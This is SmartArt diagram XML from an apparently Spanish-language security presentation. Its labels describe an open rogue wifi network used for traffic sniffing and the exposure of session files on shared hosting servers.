    <dgm:cxn modelId="{0DB08EB5-AD68-4468-A1F0-EF56DD41C3F1}" srcId="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" destId="{D843460B-D78D-4856-8698-28CD2BA90342}" srcOrd="1" destOrd="0" parTransId="{373BE8D6-A2BC-4337-B876-F03C2FB4FAFD}" sibTransId="{EAD06E41-0AB4-4FA7-BEB6-E354503793D2}"/>
    <dgm:cxn modelId="{0299C5A9-D328-4371-BEA7-D6841F993C3D}" srcId="{DCCDEFEC-EC19-4EC4-8C45-B2662AC8062A}" destId="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" srcOrd="1" destOrd="0" parTransId="{D90F54EA-1088-40A0-806E-FB53B441BD63}" sibTransId="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}"/>
    <dgm:cxn modelId="{993F3EDF-EA5F-4832-B7DA-B681EED45C31}" type="presOf" srcId="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}" destId="{D13EFB59-5236-4A81-8EF4-F20AD73512FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{AEB6A2F4-EE6B-4BE1-AF16-CAF00A750C87}" type="presOf" srcId="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}" destId="{8FDFC249-40F5-4DA1-8F1D-E9AADEE40268}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{8BD519AA-F43C-4EAB-8A36-32A63276089D}" type="presOf" srcId="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}" destId="{A91CBAA5-C0C0-49E2-99B0-3F0DC12310DA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{514140A3-C064-429B-8E9A-C2C906FDB8CB}" type="presOf" srcId="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}" destId="{DF789F79-7B05-44FA-9640-E4604D893283}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{5123C1C5-DF46-4509-B48A-DF9AC23FE8E8}" type="presOf" srcId="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" destId="{5C6AE562-6BB3-43C3-AB30-5CEF1CDE856F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{8456C619-66AA-454C-BF35-E9F14C85A53B}" srcId="{DCCDEFEC-EC19-4EC4-8C45-B2662AC8062A}" destId="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" srcOrd="2" destOrd="0" parTransId="{90153F6B-735A-4648-BC51-1EF95477CEFE}" sibTransId="{A89397D5-07A7-4BCE-ADC3-9EDC563350E3}"/>
    <dgm:cxn modelId="{92E991AE-8234-4689-9A9C-F1238A16A277}" type="presOf" srcId="{D843460B-D78D-4856-8698-28CD2BA90342}" destId="{16551DD0-CFFA-4535-A6EE-368CA9455203}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{D955275B-2C02-41DF-9EA9-F3A456852919}" type="presOf" srcId="{BED511E1-31A4-48E9-9233-02EFF8BACFF9}" destId="{BABCD728-5E7E-459E-BE08-DE5FDA4D18A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{DFA261A3-AF5E-4801-A193-4F9036374C0F}" type="presOf" srcId="{0AF2363F-7EE0-4F22-A283-81BB7C75EBAD}" destId="{A36BF611-F42D-499C-8A8D-29AF9E6AE570}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{580EA674-46B9-495C-BDFB-D6204D191EC7}" srcId="{DCCDEFEC-EC19-4EC4-8C45-B2662AC8062A}" destId="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" srcOrd="0" destOrd="0" parTransId="{DDA6A2F7-6517-49F9-BFC1-FDB534774E06}" sibTransId="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}"/>
    <dgm:cxn modelId="{4703944D-3AED-43D1-8436-3BF8F6FD774A}" type="presOf" srcId="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" destId="{683D1A49-9795-43B0-97AA-FCAC4D5F3172}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{2CC35771-98B2-44B8-B096-BC5250524387}" type="presParOf" srcId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" destId="{D493D82B-1D1B-4B1C-AA54-3EFFA0B1DA05}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{560080F3-5E2A-4D0A-8915-F00D3917E388}" type="presParOf" srcId="{D493D82B-1D1B-4B1C-AA54-3EFFA0B1DA05}" destId="{5C6AE562-6BB3-43C3-AB30-5CEF1CDE856F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{43B7F9CA-0CAC-4932-BD40-656A12E6DFBD}" type="presParOf" srcId="{D493D82B-1D1B-4B1C-AA54-3EFFA0B1DA05}" destId="{9F5D8DF4-53A9-40D4-AD99-810CF75C7D90}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{AFB481B1-269B-4682-8844-14561BF97EDF}" type="presParOf" srcId="{D493D82B-1D1B-4B1C-AA54-3EFFA0B1DA05}" destId="{16551DD0-CFFA-4535-A6EE-368CA9455203}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{97FF87F3-810F-4DC0-BC54-2E7C0093C98E}" type="presParOf" srcId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" destId="{DF789F79-7B05-44FA-9640-E4604D893283}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{49032647-AD13-4AFB-9E74-714D6FC9AA21}" type="presParOf" srcId="{DF789F79-7B05-44FA-9640-E4604D893283}" destId="{8FDFC249-40F5-4DA1-8F1D-E9AADEE40268}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{F4282AF2-B39B-4FE9-961C-98F9D14077D5}" type="presParOf" srcId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" destId="{8F533BBC-D97A-44F3-93F8-4BFA9D4B5147}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{710BC503-D297-41BF-9D26-8B1E34223556}" type="presParOf" srcId="{8F533BBC-D97A-44F3-93F8-4BFA9D4B5147}" destId="{A4AABA46-065E-43BF-BA3D-AA6D4E371E15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{11CA8970-9AE3-4D9D-A035-E811B5A263FC}" type="presParOf" srcId="{8F533BBC-D97A-44F3-93F8-4BFA9D4B5147}" destId="{7781D153-CE8A-4DB2-AB8E-43C48D0C4E33}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{FD0BF911-10FC-44C7-AA0B-340C65C4E0B8}" type="presParOf" srcId="{8F533BBC-D97A-44F3-93F8-4BFA9D4B5147}" destId="{BABCD728-5E7E-459E-BE08-DE5FDA4D18A6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{959B6D3D-1FCA-422A-AA13-164700B827E9}" type="presParOf" srcId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" destId="{D13EFB59-5236-4A81-8EF4-F20AD73512FB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{1E7F890C-6CBD-4E38-9459-48041FC6A9A7}" type="presParOf" srcId="{D13EFB59-5236-4A81-8EF4-F20AD73512FB}" destId="{A91CBAA5-C0C0-49E2-99B0-3F0DC12310DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{11F8F863-D020-4AE2-AD21-B656CA81A251}" type="presParOf" srcId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" destId="{667812FA-8316-412A-846B-32EA212CE049}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{0499B036-64BC-46D1-9654-BCDDADE8E7BB}" type="presParOf" srcId="{667812FA-8316-412A-846B-32EA212CE049}" destId="{FC85646A-0962-4B0E-932B-E5F121DB3D19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{5DC8D8B3-497D-434A-A0A3-289AD74E7159}" type="presParOf" srcId="{667812FA-8316-412A-846B-32EA212CE049}" destId="{683D1A49-9795-43B0-97AA-FCAC4D5F3172}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{4043D4B8-6B23-4002-AF7C-E8C5065AC4CF}" type="presParOf" srcId="{667812FA-8316-412A-846B-32EA212CE049}" destId="{A36BF611-F42D-499C-8A8D-29AF9E6AE57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5D5161-CB09-4A07-9E64-8EE72AD5918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3025CEB-2CEC-418E-A49E-7C62E848C5F4}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Creo wifi sin clave en lugar público</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B5B46D6-F8C7-46CD-8EC7-1E261BBAB641}" type="parTrans" cxnId="{C8A69959-F185-4CBB-BD09-1BEC69BB0E78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B24A2151-7344-4E80-85E1-F0D07FCAF2FC}" type="sibTrans" cxnId="{C8A69959-F185-4CBB-BD09-1BEC69BB0E78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6826F93-BB16-4BBE-909E-AB2A60178659}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Usuarios se conectan</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A452E6B1-16CD-4DA0-BFB1-3208912D4002}" type="parTrans" cxnId="{8384BCC3-72E1-4B02-B216-C7AFE45670D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C764BAE6-D4A0-42C2-8419-C123EBD0971C}" type="sibTrans" cxnId="{8384BCC3-72E1-4B02-B216-C7AFE45670D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14067760-0988-4C3C-A5C1-A71F12443C54}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Posibilidad de ver todo el trafico de red</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84DE9DD6-D9DF-44A3-A392-ED29BF0AA8C5}" type="parTrans" cxnId="{76B69609-42C5-48A5-AD07-330B038CEC9E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B8AE035-038A-4876-92E1-DE4140D92CFA}" type="sibTrans" cxnId="{76B69609-42C5-48A5-AD07-330B038CEC9E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43115586-6EB3-41A6-BB6B-3ADD004FE227}" type="pres">
      <dgm:prSet presAssocID="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" presName="CompostProcess" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8908D51B-00E2-4244-AEC7-C14CB7D265B0}" type="pres">
      <dgm:prSet presAssocID="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" type="pres">
      <dgm:prSet presAssocID="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" presName="linearProcess" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{84459B1F-21D2-4709-A8CC-EA3DB8191B02}" type="pres">
      <dgm:prSet presAssocID="{03025CEB-2CEC-418E-A49E-7C62E848C5F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172B82-06A2-4FDB-A7E4-A88A5CF39368}" type="pres">
      <dgm:prSet presAssocID="{B24A2151-7344-4E80-85E1-F0D07FCAF2FC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BBAE9B8-A355-48F1-B9DB-D48D76E15FDF}" type="pres">
      <dgm:prSet presAssocID="{A6826F93-BB16-4BBE-909E-AB2A6017865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C07FA82-DEB5-434E-AC67-FA0CAEF88D13}" type="pres">
      <dgm:prSet presAssocID="{C764BAE6-D4A0-42C2-8419-C123EBD0971C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{137F0481-A3C2-405C-BD32-9E515B024DEA}" type="pres">
      <dgm:prSet presAssocID="{14067760-0988-4C3C-A5C1-A71F12443C5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ACBBD33-EF47-434C-83D6-D839EBF9C076}" type="presOf" srcId="{A6826F93-BB16-4BBE-909E-AB2A60178659}" destId="{6BBAE9B8-A355-48F1-B9DB-D48D76E15FDF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{3144FEE1-8CE8-4411-B331-69398222B257}" type="presOf" srcId="{14067760-0988-4C3C-A5C1-A71F12443C54}" destId="{137F0481-A3C2-405C-BD32-9E515B024DEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{8384BCC3-72E1-4B02-B216-C7AFE45670D9}" srcId="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" destId="{A6826F93-BB16-4BBE-909E-AB2A60178659}" srcOrd="1" destOrd="0" parTransId="{A452E6B1-16CD-4DA0-BFB1-3208912D4002}" sibTransId="{C764BAE6-D4A0-42C2-8419-C123EBD0971C}"/>
    <dgm:cxn modelId="{2FB4F8A4-583B-4108-970D-975A1C25638B}" type="presOf" srcId="{03025CEB-2CEC-418E-A49E-7C62E848C5F4}" destId="{84459B1F-21D2-4709-A8CC-EA3DB8191B02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C8A69959-F185-4CBB-BD09-1BEC69BB0E78}" srcId="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" destId="{03025CEB-2CEC-418E-A49E-7C62E848C5F4}" srcOrd="0" destOrd="0" parTransId="{6B5B46D6-F8C7-46CD-8EC7-1E261BBAB641}" sibTransId="{B24A2151-7344-4E80-85E1-F0D07FCAF2FC}"/>
    <dgm:cxn modelId="{76B69609-42C5-48A5-AD07-330B038CEC9E}" srcId="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" destId="{14067760-0988-4C3C-A5C1-A71F12443C54}" srcOrd="2" destOrd="0" parTransId="{84DE9DD6-D9DF-44A3-A392-ED29BF0AA8C5}" sibTransId="{4B8AE035-038A-4876-92E1-DE4140D92CFA}"/>
    <dgm:cxn modelId="{0396088D-22FE-4798-9A11-0B1F3CA5D397}" type="presOf" srcId="{C25D5161-CB09-4A07-9E64-8EE72AD5918F}" destId="{43115586-6EB3-41A6-BB6B-3ADD004FE227}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C9EDDBC8-42B0-41D6-9660-7B80D083D09D}" type="presParOf" srcId="{43115586-6EB3-41A6-BB6B-3ADD004FE227}" destId="{8908D51B-00E2-4244-AEC7-C14CB7D265B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{4681C769-7105-4834-8D45-B25B3C67776F}" type="presParOf" srcId="{43115586-6EB3-41A6-BB6B-3ADD004FE227}" destId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{E3D68555-5B95-41B4-A71D-FFF839B2F863}" type="presParOf" srcId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" destId="{84459B1F-21D2-4709-A8CC-EA3DB8191B02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{584EE361-FF00-4185-8534-DF6EC91A69F1}" type="presParOf" srcId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" destId="{D3172B82-06A2-4FDB-A7E4-A88A5CF39368}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{851F8088-7BB7-43C8-85AA-5A35E2553B2B}" type="presParOf" srcId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" destId="{6BBAE9B8-A355-48F1-B9DB-D48D76E15FDF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{AD4B5DAD-250F-4966-9305-4FD4EE5B6CB7}" type="presParOf" srcId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" destId="{3C07FA82-DEB5-434E-AC67-FA0CAEF88D13}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{7C95EA31-97D9-4B0F-B8AA-B34A12AED621}" type="presParOf" srcId="{CE5D9789-E116-4C44-B4B8-3395E5B16F6C}" destId="{137F0481-A3C2-405C-BD32-9E515B024DE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485DC6-9B42-41C1-B55D-7EED87EBBBBD}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/h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0795222-E689-410F-B69C-5B7492A7A9FE}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0"/>
            <a:t>Servidor compartido</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25CBF3C3-7567-447D-99E0-1A630FF91F53}" type="parTrans" cxnId="{CA0BA767-B689-4D5F-AD53-07FF6EB0A368}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BAF4E8B-49BB-4704-B7A9-3A9EC4C937A4}" type="sibTrans" cxnId="{CA0BA767-B689-4D5F-AD53-07FF6EB0A368}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A573EE3-F783-4DEC-A3AD-DB00D69AB387}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
            <a:t>los archivos físicos de las sesiones se guardan, por defecto, en un directorio común para todas las páginas web del servidor</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71EB3E8A-0954-4407-94EF-FB4EF214E9F4}" type="parTrans" cxnId="{C823EEF7-E442-487B-B49E-B6726072391D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD83B9F9-9569-49AD-8993-4F8A6FB3DECC}" type="sibTrans" cxnId="{C823EEF7-E442-487B-B49E-B6726072391D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61590EE7-98D9-4188-9529-B639DB5BE2A4}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Todas las personas que tengan alojada su web, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
            <a:t>puden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
            <a:t>accder</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t> a archivos de sesiones</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76FC7A4C-CBA0-478A-AFA3-1B9F7728E430}" type="parTrans" cxnId="{3EA5509D-E3AA-4DE0-8F9B-3C7B164A9BF5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42BCDD31-9925-43BD-A31B-8F0345ACA322}" type="sibTrans" cxnId="{3EA5509D-E3AA-4DE0-8F9B-3C7B164A9BF5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED97655F-C9EB-4635-ACB0-87A72826B846}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
            <a:t>lista de identificadores de sesión válidos con sólo leer la lista de archivos del directorio común</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBFB29DD-5B0D-4704-A418-6D431CC280C7}" type="parTrans" cxnId="{DF66B481-8E69-468A-AF48-5D8627336818}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78FDCDD1-9257-4A0A-8A95-57695F5F87D9}" type="sibTrans" cxnId="{DF66B481-8E69-468A-AF48-5D8627336818}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41EB9611-7FCC-4C80-AE04-8EEAE5CA569A}" type="pres">
      <dgm:prSet presAssocID="{C0485DC6-9B42-41C1-B55D-7EED87EBBBBD}" presName="composite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3255D9C8-627F-4200-BDDE-4E648F85E983}" type="pres">
      <dgm:prSet presAssocID="{90795222-E689-410F-B69C-5B7492A7A9FE}" presName="roof" presStyleLbl="dkBgShp" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborX="-482"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70AF0818-8322-4733-AC50-C70D5F3D25AA}" type="pres">
      <dgm:prSet presAssocID="{90795222-E689-410F-B69C-5B7492A7A9FE}" presName="pillars" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12AE330B-2954-4157-8EEF-4AB95C140D1A}" type="pres">
      <dgm:prSet presAssocID="{90795222-E689-410F-B69C-5B7492A7A9FE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9D8099-9F37-449D-849D-6813161A2E30}" type="pres">
      <dgm:prSet presAssocID="{61590EE7-98D9-4188-9529-B639DB5BE2A4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011D72-EC3E-45BF-8EB8-6F8B23AD0261}" type="pres">
      <dgm:prSet presAssocID="{ED97655F-C9EB-4635-ACB0-87A72826B846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0152D29-F963-4D17-83DA-5D69E0E8D63F}" type="pres">
      <dgm:prSet presAssocID="{90795222-E689-410F-B69C-5B7492A7A9FE}" presName="base" presStyleLbl="dkBgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{060DBEF7-4F76-4101-B527-63431B1AFA01}" type="presOf" srcId="{C0485DC6-9B42-41C1-B55D-7EED87EBBBBD}" destId="{41EB9611-7FCC-4C80-AE04-8EEAE5CA569A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{DF66B481-8E69-468A-AF48-5D8627336818}" srcId="{90795222-E689-410F-B69C-5B7492A7A9FE}" destId="{ED97655F-C9EB-4635-ACB0-87A72826B846}" srcOrd="2" destOrd="0" parTransId="{BBFB29DD-5B0D-4704-A418-6D431CC280C7}" sibTransId="{78FDCDD1-9257-4A0A-8A95-57695F5F87D9}"/>
    <dgm:cxn modelId="{EAE01976-8EF3-474B-8C77-CA6AD8EC8B96}" type="presOf" srcId="{0A573EE3-F783-4DEC-A3AD-DB00D69AB387}" destId="{12AE330B-2954-4157-8EEF-4AB95C140D1A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{744A2E2A-F993-4F9D-8DDE-E66F4ECA34A2}" type="presOf" srcId="{ED97655F-C9EB-4635-ACB0-87A72826B846}" destId="{A3011D72-EC3E-45BF-8EB8-6F8B23AD0261}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
